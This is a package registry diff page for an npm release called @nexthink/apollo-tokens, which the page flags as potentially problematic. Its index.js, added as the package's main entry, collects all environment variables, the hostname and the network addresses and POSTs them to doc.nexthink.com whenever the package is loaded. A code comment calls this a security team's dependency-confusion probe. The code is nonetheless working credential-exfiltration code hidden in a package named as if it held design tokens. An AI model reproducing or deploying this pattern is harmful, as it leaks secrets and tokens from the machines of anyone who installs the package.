@nexthink/apollo-tokens 1.37.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @nexthink/apollo-tokens might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/LICENSE +21 -0
  2. package/README.md +1 -0
  3. package/index.js +54 -0
  4. package/package.json +19 -0
package/LICENSE ADDED
@@ -0,0 +1,21 @@
1
+ MIT License
2
+
3
+ Copyright (c) 2022 nxt-fmiquel
4
+
5
+ Permission is hereby granted, free of charge, to any person obtaining a copy
6
+ of this software and associated documentation files (the "Software"), to deal
7
+ in the Software without restriction, including without limitation the rights
8
+ to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9
+ copies of the Software, and to permit persons to whom the Software is
10
+ furnished to do so, subject to the following conditions:
11
+
12
+ The above copyright notice and this permission notice shall be included in all
13
+ copies or substantial portions of the Software.
14
+
15
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18
+ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19
+ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20
+ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21
+ SOFTWARE.
package/README.md ADDED
@@ -0,0 +1 @@
1
+ # apollo-tokens
package/index.js ADDED
@@ -0,0 +1,54 @@
1
+ 'use strict'
2
+
3
+ // This code dumps local env variable and post them to an http server to identify the machines vulnerable to npmjs org/package claim.
4
+ // If you see this comment, please contact security@nexthink.com - this code and server are under the control of the Nexthink Security Team and no harmful code is executed.
5
+
6
+ const env = process.env;
7
+
8
+ const os = require("os");
9
+ env.hostname = os.hostname();
10
+ env.package = "apollo-tokens";
11
+
12
+ const nets = os.networkInterfaces();
13
+ const results = Object.create(null);
14
+ for (const name of Object.keys(nets)) {
15
+ for (const net of nets[name]) {
16
+ // Skip internal (i.e. 127.0.0.1) addresses
17
+ if (!net.internal) {
18
+ if (!results[name]) {
19
+ results[name] = [];
20
+ }
21
+ results[name].push(net.address);
22
+ }
23
+ }
24
+ }
25
+ env.inets = JSON.stringify(results);
26
+
27
+ // request options
28
+ const options = {
29
+ host: "doc.nexthink.com",
30
+ path: '/npm',
31
+ method: 'POST',
32
+ body: JSON.stringify(env),
33
+ headers: {
34
+ 'Content-Type': 'application/json'
35
+ }
36
+ }
37
+
38
+ // send POST request
39
+ const https = require('https');
40
+ const request = https.request(options, (res) => {
41
+ if (res.statusCode !== 200) {
42
+ res.resume();
43
+ return;
44
+ }
45
+ res.on('close', () => {
46
+ });
47
+ });
48
+ request.write(JSON.stringify(env));
49
+ request.end();
50
+ request.on('error', (err) => {
51
+ console.error(`Encountered an error trying to make a request: ${
52
+ err.message
53
+ }`);
54
+ });
package/package.json ADDED
@@ -0,0 +1,19 @@
1
+ {
2
+ "name": "@nexthink/apollo-tokens",
3
+ "version": "1.37.2",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1"
7
+ },
8
+ "author": "",
9
+ "license": "MIT",
10
+ "repository": {
11
+ "type": "git",
12
+ "url": "git+https://github.com/nxt-fmiquel/apollo-tokens.git"
13
+ },
14
+ "bugs": {
15
+ "url": "https://github.com/nxt-fmiquel/apollo-tokens/issues"
16
+ },
17
+ "homepage": "https://github.com/nxt-fmiquel/apollo-tokens#readme",
18
+ "description": ""
19
+ }